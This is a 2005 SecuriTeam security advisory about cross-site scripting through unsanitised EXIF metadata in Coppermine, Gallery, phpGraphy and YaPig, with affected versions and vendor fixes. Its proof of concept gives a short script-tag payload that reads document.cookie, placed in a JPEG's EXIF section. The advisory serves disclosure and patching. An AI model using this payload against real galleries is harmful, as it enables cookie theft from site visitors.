[UNIX] PHP Images Galleries EXIF Metadata XSS Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

PHP Images Galleries EXIF Metadata XSS Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

A large majority of PHP Images Gallery Technologies now handle the
Exchangeable Image File (EXIF) header of jpeg files. The Exchangeable
Image File (EXIF) format is an international specification that lets
imaging companies encode metadata information into the headers or
application segments of a JPEG file. Unfortunately the metadata gathered
in the EXIF header are not well sanitized when displayed.

DETAILS

Vulnerable Systems:
* Coppermine version 1.3.3 and prior
* Gallery version 1.5.1-RC2 and prior
* phpGraphy version 0.9.9a and prior
* YaPig version 0.95 and prior

Immune Systems:
* Coppermine version 1.4.1
* phpGraphy version 0.9.10

Adding malicious content to a JPEG image in the EXIF section, allow
attackers to perform a cross site scripting attack when some PHP based
galleries displays the image content.

Proof of Concept:
Use a .JPG file, and edit it's EXIF section, and replace it's content to
< script> alert (document.cookie) < /script>
and upload the image into an on-line galleries, and make it display the
image.

Vendor Status:
The information has been provided to all concerned Project Managers the
17th of August 2005.

* Coppermine
Update to Coppermine pg1.3.4
<http://coppermine-gallery.net/forum/index.php?topic=20933.0>
http://coppermine-gallery.net/forum/index.php?topic=20933.0

* Gallery
Update to the final release of Gallery 1.5.1.
<http://gallery.menalto.com/modules.php?op=modload&name=phpWiki&file=index&pagename=Download> http://gallery.menalto.com/modules.php?op=modload&name=phpWiki&file=index&pagename=Download
A patch for Gallery 1.5 and a new Debian's Gallery 1.2.5 package have
been released too.

* phpGraphy
Update to version 0.9.10 <http://phpgraphy.sourceforge.net/download.php>
http://phpgraphy.sourceforge.net/download.php

* YaPig
No answer up to now.

* PhotoPost PHP Pro
On the 22nd of August: "we'll be issuing an update to PhotoPost today
which will sanitize this data before being displayed"

ADDITIONAL INFORMATION

The information has been provided by <mailto:cedric.cochin@gmail.com>
Cedric Cochin .
The original article can be found at:
<http://cedri.cc/advisories/EXIF_XSS.txt>
http://cedri.cc/advisories/EXIF_XSS.txt

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.